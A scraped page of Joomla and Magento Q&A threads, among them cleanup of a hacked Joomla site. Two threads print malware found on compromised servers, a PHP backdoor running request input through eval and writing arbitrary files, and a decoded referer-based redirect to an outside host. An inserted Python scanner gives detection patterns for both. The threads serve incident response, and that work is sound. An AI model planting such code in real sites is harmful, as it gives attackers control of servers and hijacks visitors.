Hacking of Joomla 2.5 - joomla

I have a customer whose Joomla website was hacked, I am not exactly sure how it happened but I can see that there are many scripts that send out spam email, upon searching for files that contain the word eval( I found 61 matches like the following file:
<?php
$lbdw = "495c05e857e328e1e65ca6b0bc03dc88"; // unused string; the backdoor never reads it
// Remote code execution: whatever the request parameter holds is run as PHP.
if (isset($_REQUEST['tlhqdsj'])) {
    $mglvq = $_REQUEST['tlhqdsj'];
    eval($mglvq);
    exit();
}
// Arbitrary file write: both the target path and the contents come from the request.
if (isset($_REQUEST['ofva'])) {
    $ulmajcbk = $_REQUEST['tbun'];
    $cdpumv = $_REQUEST['ofva'];
    $tgcjl = fopen($cdpumv, 'w');
    $ogrmbcz = fwrite($tgcjl, $ulmajcbk);
    fclose($tgcjl);
    echo $ogrmbcz;
    exit();
}
?>
I do not want to delete the whole website because I did not develop it, all I need is a security checklist and a way of searching for other known exploits.
What other precautions should I take on the server where this Joomla website is installed?
Any idea how they were able to upload so many files to the server?

This is a botnet PHP file, likely spread through an exploit in Joomla (there was one disclosed in mid-August, for example). It allows a remote user to execute arbitrary PHP code and upload files to your server. See the Joomla security page for more information.
My strongest recommendation would be to wipe the entire server -- or at least anything the customer's user had access to -- and start over. You never know what the attacker has uploaded, and you can never be completely sure there aren't more backdoors present.
If that's infeasible, I recommend wiping the Joomla install and reinstalling with a fresh copy of Joomla 2.5.14 or 3.1.5.
If you can't even do that, well, you can try upgrading Joomla in-place, searching for infected PHP files, and deleting them. You're running a strong risk that you'll miss a file and remain vulnerable, though.

Adding to the above answer, I would like you to read the following:
Security Checklist/You have been hacked or defaced
Joomla hacked. How to prevent?
Joomla Security
Vulnerable Extensions List

Related

Hostgator Addon Domain Redirecting to Primary Domain Subdirectory

This is for a client so I won't share exact domains, but the problem is as follows:
I took over development of a website from a prior developer.
The hosting is Hostgator Business.
The primary domain is primary.com.
There is an addon domain addon.com.
The primary domain document root is /home1/username/public_html.
The addon's document root is /home1/username/addon.com.
www.addon.com had a WordPress installation which the developer had edited instead of using plugins to achieve his goals. The site also needed a complete redesign so I felt it logical to simply wipe the installation and replace it.
So, I deleted all of the WordPress files and uploaded a new copy of WordPress from wordpress.org/latest.tar.gz
Prior to deleting the old installation, the domain loaded files from its document root perfectly.
After uploading the new installation, instead of resolving to addon.com it resolves to primary.com/addon.com.
I've never seen this happen before so I'm lost.
There's no errors in any available logs.
All file permissions are correct. I've triple-checked.
I've tried deleting all files and creating simple index.php and index.html files to see if it would access them ... it doesn't.
This happens in each browser I use on Windows and Linux.
I don't understand it because all I did was swap out the old WP install for a new one.
I went and re-uploaded the old WordPress installation so everything is 100% how it was but it is still going to primary.com/addon.com instead of addon.com.
Has anyone faced this issue before? I usually use Bluehost but even when I've used Hostgator in the past I've never seen this happen.
I double-checked the addon domain settings as well as anything else I could think of and everything appears normal.
I even deleted the addon domain and re-added it with the document root of /home1/username/addon.com and it still goes to primary.com/addon.com in the browser.
I submitted a ticket with Hostgator but they have not replied yet.
I'm sorry if this is long. This is my first time asking for help on here and I wanted to be sure I included everything I could.
Hostgator finally got back to me.
The previous developer had used the one-click WordPress install.
Apparently once someone uses a one-click install, the only way it works is if you keep using the one-click install; you cannot do it manually any more.
From all the servers and sites I've setup this makes no sense and is a problem with Hostgator. Support did not really tell me anything other than "you have to use the one click install since the prior developer did". Great service.
Hope this saves someone some hassle.
From this it sounds like you were moving a WordPress site from the primary domain to an add on domain.
Simply moving the files from the primary to the add on domain will not make it work on the add on domain because in the database and throughout the coding of the WordPress site it would all be configured and coded for the primary domain.
It sounds like you would need to update the site home and site url from the primary to the add on domain url.
http://support.hostgator.com/articles/specialized-help/technical/wordpress/wordpress-home-fix
Also, I would suggest using a search-and-replace type plugin to go through all the internal coding to update the URLs and links to the add-on domain.
There is more information here as well http://codex.wordpress.org/Moving_WordPress

Joomla loading slow. Menu items not loading

Lately my Joomla website was not showing properly, only the background image was loading, and some minor things.
Somehow the page template (index.php) was changed and some extra code was added. Specifically, this code:
eval(base64_decode("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"));
was introduced several times throughout the php code, which is causing slow loading times (about 15-20 seconds to load any page) in my website.
It appears your site was hacked, this means it can be hacked again.
If you're using Joomla 1.5 you should upgrade to at least the 2.5.x line; if you can't, make sure you are using version 1.5.26.
Next check all the extensions you have installed against the VEL (Joomla!'s Vulnerable Extensions List)
Once you've done that, you should secure your site using products like AdminTools or similar highly rated products from the Site Protection section of the Joomla Extensions Directory, etc.
By the way, that particular payload was built to capture users referred to your site by search engines and redirect them to http://poasm.qpoe.com/. It decodes to this:
error_reporting(0);                  // hide any warnings the injected code produces
$qazplm=headers_sent();
if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        // Old Internet Explorer versions are skipped.
        if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
            // Only visitors arriving from a search engine, social site or link shortener are targeted,
            // so the site owner, who types the URL directly, never sees the redirect.
            if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"live.com") or stristr($referer,"webalta") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com/l") or stristr($referer,"aol.com")) {
                // Meant to skip cached results and advanced-operator searches
                // (with "or" rather than "and" this condition is nearly always true).
                if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                    header("Location: http://poasm.qpoe.com/");
                    exit();
                }
            }
        }
    }
}
I stumbled upon this comment and was finally able to solve my problem.
Just go to administration --> Extensions --> Template Manager. Go to the Templates section, select your template, select Edit main page template, and rid your index.php of all those garbage function calls. Cleaning it solved the problem for me; now everything is back to normal, everything loads as fast as before and all the pages display properly.
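The two payloads quoted on this page (the request-driven eval and file-write shell in the Joomla 2.5 hacking question above, and the eval(base64_decode(...)) referer redirect in this thread) can be found across a web root with a small scanner. The following is an added example, not code from either thread or from the Joomla project; the rule names, the scan_tree function and the two SAMPLE_ strings are my own, and the samples are constructed stand-ins for the quoted payloads rather than the real files.

```python
import os
import re

# Superglobals an attacker controls directly, as a regex fragment.
INPUT = r"\$_(?:REQUEST|GET|POST|COOKIE)\s*\["
ASSIGN = re.compile(r"(\$\w+)\s*=\s*" + INPUT)          # $x = $_REQUEST['k']
SINKS = re.compile(r"\b(eval|fopen|fwrite|file_put_contents|system|shell_exec|passthru)\s*\(([^;]*)")
LINE_RULES = {
    "eval-of-request": re.compile(r"\beval\s*\(\s*" + INPUT),
    "eval-of-base64": re.compile(r"\beval\s*\(\s*base64_decode\s*\("),
}
# Constructed samples mirroring the two payloads quoted in these threads (not the real files).
SAMPLE_SHELL = """<?php
$x = $_REQUEST['a']; eval($x);
$p = $_REQUEST['f']; $d = $_REQUEST['b'];
$h = fopen($p, 'w'); fwrite($h, $d); fclose($h);
"""
SAMPLE_REDIRECT = """<?php
eval(base64_decode("..."));
$r = $_SERVER['HTTP_REFERER'];
if (stristr($r, "bing")) { header("Location: http://redirect.invalid/"); exit(); }
"""

def scan_source(src):
    """Return sorted (line_no, rule) hits for one PHP source string; line 0 marks a whole-file rule."""
    hits, tainted = set(), set()       # tainted: variables assigned from request input so far
    for no, line in enumerate(src.splitlines(), 1):
        hits.update((no, rule) for rule, pat in LINE_RULES.items() if pat.search(line))
        tainted.update(m.group(1) for m in ASSIGN.finditer(line))
        for name, args in SINKS.findall(line):
            if any(re.search(re.escape(v) + r"\b", args) for v in tainted):
                hits.add((no, name + "-of-tainted-input"))
    # The decoded redirect payload keys on HTTP_REFERER and then sends a Location header.
    if "HTTP_REFERER" in src and re.search(r"header\s*\(\s*['\"]Location:", src):
        hits.add((0, "referer-conditional-redirect"))
    return sorted(hits)

def scan_tree(root):
    """Map each .php path under root to its hits; clean files are omitted."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_source(fh.read())
                if hits:
                    findings[path] = hits
    return findings
```

Call scan_tree() on the web root and review every hit by hand; a clean Joomla template or extension should produce none of these rules, so each hit is a file to quarantine and compare against a fresh copy.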

Change administrator path in joomla 2.5

I've been using Joomla for the past 2 years. As Joomla is a very popular CMS for PHP lovers, hackers are always trying to deface websites built on Joomla. Anyone can easily detect whether a website is using Joomla or any other technology by using the Wappalyzer software. In Joomla we can access the administrator panel by typing
http://phalana.com/administrator.
So my question is how to change the /administrator path to something else so that hackers will not get to the administrator panel. So far I've seen a number of extensions in the official Joomla directory, but something is still lacking. Can anyone help me to change the administrator path?
Changing /administrator is a very bad idea for a lot of reasons, the top one, ironically, being security. Apart from that it:
breaks lots of components
cuts you off from easy application of security updates
has effects that are unknown from a security point of view
The best way to secure Joomla's /administrator area is to follow some simple steps...
Add realm authentication to the /administrator directory; that way, unless your hacker manages to figure out the username and password, they're stumped.
Use an extension like JSecure or Akeeba's Admin Tools (both allow you to set a "secret word" on the administrator URL) or check the extensions already available in the Login Protection section of the Joomla! Extension Directory (called JED for short). N.B. I personally like Admin Tools the most, with the /administrator?secretword, their application firewall and the .htaccess maker.
Follow the advice on the Joomla Docs website Security Checklist.
Personally we do all of these things and a bit more... as we keep telling people.
You can protect or hide your /administrator directory by creating an alternative directory which sets a cookie that is sent in the HTTP header of the request. That cookie will be validated by the index.php file in the /administrator directory; if it is not validated (when an unauthorized user wants to detect whether your site is Joomla based by the known /administrator directory), the request will be redirected to the root directory of your site.
These are the steps.
* Create an alternative /administrator directory, e.g. /admins_place
* Inside /admins_place, create an index.php with the following code snippet:
<?php
// Set the marker cookie for the whole site, then send the browser to the real administrator directory.
$admin_cookie_code = "_hashed_secret_code_here_";
setcookie("JoomlaAdminSession", $admin_cookie_code, 0, "/");
header("Location: ../administrator/index.php");
exit();
?>
* In the administrator directory, add this code snippet at the beginning of the index.php file:
<?php
// The value must match the one set in /admins_place exactly, and exit() is required:
// a Location header alone does not stop PHP from running the rest of the file.
if (!isset($_COOKIE['JoomlaAdminSession']) || $_COOKIE['JoomlaAdminSession'] !== "_hashed_secret_code_here_") {
    header("Location: ../index.php");
    exit();
}
?>
I hope this helps

Magento : CMS upload image fail silently

I am trying to figure out why the tinyMCE WYSIWYG editor in the CMS module of Magento will not upload images. I can create/delete folders but any file will simply not get uploaded, and there seems to be no message as to why the file is not successfully written on the server.
Does anyone have an idea why?
** Update **
I'm using Magento 1.6.2. I have tried to track down the problem and it seems that the controller never gets executed. I have added a line to log the arguments in the uploadAction() action (in Mage_Adminhtml_Cms_Wysiwyg_ImagesController) and nothing gets logged.
This is a project inherited from someone else, and it was modified to some extent, but nothing seems to indicate that this part of Magento would have been touched in any way by the modifications.
** EDIT**
The project associated with this question has been dropped and I can no longer provide an answer to this question. If anyone can confirm a working answer (as this problem was apparently common with Magento), I will gladly mark that answer as "accepted".
Otherwise, I will flag this question for removal for the aforementioned reasons.
Thank you.
Other than solutions provided here, it may occur when you use a CDN (or a different domain) for your javascript and media files in admin panel. If you use CDN, use it for your website(s) scope and use your own domain for default scope. It will make your website(s) media and javascript files to be loaded from CDN, and backend's media and javascript files to be loaded from your own domain. This will solve your problem.
There are some known issues with the Flash image uploader on Magento. Unfortunately, when it fails, it fails silently. Here are some cases when something can break it:
if you try to use it with secured connection using open ssl certificate
if you're using it on server with apache authentication
on some Magento versions with prototype 1.7
I think the latter is your best bet. Maybe you should try to apply the patch from here: http://www.magentocommerce.com/boards/viewthread/4348/P45/#t327010
In my case it was a cross domain problem, and one quite hard to find if you ask me...
What was puzzling me was that the uploader for product images was working like a charm but the one in the CMS section was failing completely silently. We are serving the skin folder from an Amazon S3 bucket, and the flash uploader lives under that folder.
Interestingly enough, our version of Magento (1.7.0.2) is using two different methods to calculate the path to the SWF file, depending whether you are under CMS or Product update.
The CMS file (app/design/adminhtml/default/default/template/cms/browser/content/uploader.phtml) is using the following method to embed the Flash Uploader:
<?php echo $this->getSkinUrl('media/uploader.swf') ?>
While the Product image uploader is using:
<?php echo $this->getUploaderUrl('media/uploader.swf') ?>
In our case, the first one resolves to the AWS S3 url, obviously in a separate domain, while the second one will still reference the local domain's url.
So yeah, the quick, dirty fix would be to replace getSkinUrl for getUploaderUrl in app/design/adminhtml/default/default/template/cms/browser/content/uploader.phtml. Alternatively you can extend the core to load a different template in which you would have replaced that method.
I hope this helps somebody... I wish I had found something like this five days ago when I first stumbled upon the issue :-)
Are you using the Flash uploader with HTTPS? If so, is your secure address on a different domain (as usually happens with shared SSL)?
I had some trouble with this. I solved it by installing a Flash uploader disabler plugin.
You can download the plugin with this downloader key:
http://connect20.magentocommerce.com/community/Dull_Uploader
I hope it helps.

Taking over a Joomla created site

So I have a client who has a disc of an entire site. Root server files, all the way to /httphome/ files...
However, it looks like it was created using Joomla. Now, I know my HTML and CSS but have never used a CMS like Joomla.
To get this site up and running, am I going to have to install Joomla on my client's server, and then upload the files?
I am going to assume it's not that easy.... Anyone got any insight into this process and what I'm looking at?
thanks
Keep in mind that Joomla content resides in a MySql database.
You need the following:
Database export
Create a DB on your MySQL server
Upload the files
Edit configuration.php to work with your DB and also set your path there
Also, some components might need some more setup, as some of them have their own cfg files.
To get this site up and running (if the file is really the entire site) should be as simple as setting up a web server and pointing it to the directory with the index in it. Joomla should already be in that file. Let me know if I can elaborate on the process.
Since you are new to Joomla, you might want to try loading the disc contents up on your localhost first. Personally, when I'm trying something new, I hate for my first attempts to be somewhat public - I always feel a little safer if I do the first install someplace local where I'm the only person who can see it.
Best of luck with your project! If you run into any problems, or if you want to confirm that the site is definitely Joomla, let us know and we will get you sorted out.
Do you have the related database? The files that make up Joomla are useless without the database. You could install Joomla and upload your files over the top, but any database changes made by any installed extensions wouldn't be made to that install. You'd also be missing all of the actual site content without the database.
If you do have the database, then all you need to do is import the database into your MySQL, then upload the files you have on the disc and edit the configuration.php file with the new database user and password.